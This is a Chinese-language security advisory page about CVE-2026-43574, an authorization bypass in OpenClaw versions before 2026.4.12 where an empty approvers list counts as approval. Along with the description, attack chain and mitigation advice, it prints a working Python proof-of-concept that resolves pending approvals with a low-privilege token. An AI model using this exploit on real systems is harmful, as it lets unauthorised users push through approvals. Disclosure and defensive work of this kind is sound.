CVE-2026-43574 CVSS 6.5 中危

CVE-2026-43574 OpenClaw不当授权漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43574

漏洞类型

访问控制绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 在 2026.4.12 之前的版本中存在严重的不当授权漏洞。该漏洞源于 helper-backed channels 中的逻辑缺陷，系统错误地将空的审批者列表解释为显式批准状态。攻击者只需知道目标审批 ID，即可在无需通过正常授权流程的情况下解决待定审批。这一缺陷允许低权限用户绕过安全检查，直接执行关键操作，对系统的完整性和安全性构成严重威胁。

技术细节

该漏洞的核心在于 OpenClaw 处理 helper-backed channels 审批流程时的逻辑判断错误。在受影响的版本中，当系统尝试解析审批请求的审批者列表时，未对“空列表”这一异常状态进行有效的安全检查。代码逻辑错误地将空的解析结果等同于“已获显式批准”，而非“缺少授权”或“非法请求”。因此，攻击者首先需要进行信息收集，通过枚举或其他方式获取有效的待定审批 ID。随后，攻击者利用低权限账户向审批解决接口发送特制请求，该请求在 payload 中包含空的审批者列表。后端服务接收到请求后，触发漏洞逻辑，误认为该请求已通过所有必要授权，从而允许攻击者强制解决审批。这完全绕过了原本设计的多人审批或权限控制机制，属于典型的业务逻辑漏洞。

攻击链分析

STEP 1

信息收集

攻击者通过枚举或侧信道获取目标系统中待定审批的 ID。

STEP 2

构造恶意请求

攻击者利用低权限账户，向审批解决接口发送 POST 请求，并在 payload 中将审批者列表（approvers）设置为空数组。

STEP 3

触发逻辑漏洞

后端服务接收到请求，由于逻辑缺陷，将空的审批者列表误判为显式授权，从而绕过权限检查。

STEP 4

完成攻击

系统解决该待定审批，攻击者在未获得实际授权的情况下成功实施了操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit script for CVE-2026-43574
# Target: OpenClaw instance < 2026.4.12

def exploit(target_url, approval_id, attacker_token):
    headers = {
        "Authorization": f"Bearer {attacker_token}",
        "Content-Type": "application/json"
    }
    
    # The vulnerability is triggered by sending an empty approvers list
    payload = {
        "approval_id": approval_id,
        "approvers": [] 
    }
    
    endpoint = f"{target_url}/api/v1/approvals/resolve"
    
    try:
        response = requests.post(endpoint, json=payload, headers=headers, verify=False)
        if response.status_code == 200:
            print(f"[+] Exploit successful! Approval {approval_id} resolved.")
            print(f"[+] Response: {response.json()}")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    TARGET = "https://vulnerable-openclaw.com"
    ID = "TARGET_APPROVAL_ID"
    TOKEN = "LOW_PRIV_USER_TOKEN"
    exploit(TARGET, ID, TOKEN)

影响范围

OpenClaw < 2026.4.12

防御指南

临时缓解措施

建议立即升级到官方修复版本以彻底解决该漏洞。若暂时无法升级，应在网络边界或应用网关处配置规则，拦截包含空 approvers 列表的 API 请求，并加强对审批 ID 的访问控制，防止未授权用户进行枚举攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表